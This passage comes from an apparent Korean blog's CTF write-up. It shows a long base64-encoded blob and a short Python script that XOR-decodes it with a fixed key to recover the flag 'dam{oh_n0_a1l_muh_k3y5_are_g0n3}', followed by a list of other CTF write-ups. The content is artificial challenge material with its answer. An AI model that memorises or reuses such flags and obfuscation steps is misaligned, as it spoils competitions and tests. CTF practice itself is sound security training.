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' k = b'8675309'
p = base64.b64decode(payload)
decode = bytes([p[i] ^ k[i%len(k)] for i in range(len(p))])
i = decode.index(b'dam{')
print(decode)
print(decode[i-10:i+40])
dam{oh_n0_a1l_muh_k3y5_are_g0n3}
'CTF Writeup' 카테고리의 다른 글
| Codegate 2022 Junior 예선 WriteUp (0) | 2022.02.27 |
|---|---|
| 2021 Layer7 CTF 후기 / Writeup (1) | 2021.11.25 |
| 2021 Incognito CTF Writeup (0) | 2021.08.28 |
| 2021 전국 고등학생 보안 경진대회 WriteUp - ANUSEC 안동대 (0) | 2021.08.28 |
| Tenable CTF - CODE (0) | 2021.02.24 |